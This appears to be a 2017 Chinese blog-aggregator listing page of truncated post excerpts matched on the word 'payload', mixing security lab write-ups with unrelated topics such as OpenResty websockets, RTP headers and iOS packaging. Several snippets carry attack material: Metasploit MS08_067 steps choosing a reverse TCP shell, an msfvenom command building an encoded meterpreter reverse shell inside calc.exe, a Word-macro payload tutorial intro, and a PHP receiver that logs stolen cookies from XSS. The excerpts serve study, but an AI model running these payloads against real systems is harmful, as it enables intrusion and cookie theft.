MS08_067漏洞测试 实验步骤 search MS08_067查看相关信息 show payloads命令查找需要的攻击载荷 选择generic/shell_reverse_tcp来获取漏洞主机的shell set payload generic/shell_reverse_tcp选择paylo ...
分类:
其他好文 时间:
2017-04-15 17:26:59
阅读次数:
280
20145216史婧瑶 《网络对抗》 MSF基础应用 实验回答问题 用自己的话解释什么是exploit,payload,encode. exploit:渗透攻击模块,测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。 payload:攻击载荷模块,由一些可动态运行在远程主机上的代 ...
分类:
其他好文 时间:
2017-04-15 15:33:42
阅读次数:
255
20145326蔡馨熤《网络对抗》——MSF基础应用 实验后回答问题 用自己的话解释什么是exploit,payload,encode. exploit:起运输的作用,将数据传输到对方主机。 payload:其实就是指装载的“具体内容”。就相当于shellcode一样。 encode:对需要传输的文 ...
分类:
其他好文 时间:
2017-04-13 00:24:53
阅读次数:
282
vul--泛指漏洞 0day--未公开或虽已公开但还没有修复方法的漏洞 shellcode--远程溢出后执行的那段代码 payload--攻击载荷,送到远端机器执行的整段代码 poc--Proof of Concept,漏洞证明;可以是可以证明漏洞存在的文字描述和截图,但更多的一般是证明漏洞存在的代 ...
分类:
系统相关 时间:
2017-04-08 14:10:10
阅读次数:
394
openresty websocket 使用 1. 代码如下: local server =require"resty.websocket.server" local wb, err = server:new{ timeout =5000, max_payload_len =65535 } ifno ...
分类:
Web程序 时间:
2017-04-03 12:42:09
阅读次数:
860
本文将演示使用Veil-Evasion生成远控所需要的payload以及监听器,然后使用MacroShop生成payload 相关的VBA代码,最后演示将VBA代码写入.doc文本文档的宏中。 环境:虚拟机_Kali 依赖:Veil-Evasion、MacroShop 0x00 安装Veil-Eva ...
分类:
系统相关 时间:
2017-03-31 21:53:08
阅读次数:
1168
数据结构: 字段解释: payload type: 0x60(96), dynamic type type 定义: https://www.iana.org/assignments/rtp-parameters/rtp-parameters.xhtml https://en.wikipedia.or ...
分类:
其他好文 时间:
2017-03-29 16:00:09
阅读次数:
181
打包ipa的前提 1、证书的申请和设置和上面文章的一样 从第一步到第四步都是一样的http://www.cnblogs.com/sunfuyou/p/5900592.html2、还有第六步的 1-3都是一样的 从第四步开始变化 第二种打包api的方法:通过生成文件Payload文件夹,生成ipa包。 ...
分类:
移动开发 时间:
2017-03-13 23:39:29
阅读次数:
1919
#clientmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.106 LPORT=9999 -e x86/shikata_ga_nai -b '\x00' -x /root/demo/calc.exe -f exe > demo ...
分类:
其他好文 时间:
2017-03-11 11:48:14
阅读次数:
235
测试环境:hacker端andvictim端1,hacker端(hacker.php)的程序内容如下:<?php$cookie=$_GET[‘cookie‘];$file=fopen("cookie.txt","a");fwrite($file,$cookie);fclose($file)?>2,受害者端(victim.php)的程序内容如下:<html><head><title>xss跨站..
分类:
其他好文 时间:
2017-03-09 15:41:57
阅读次数:
162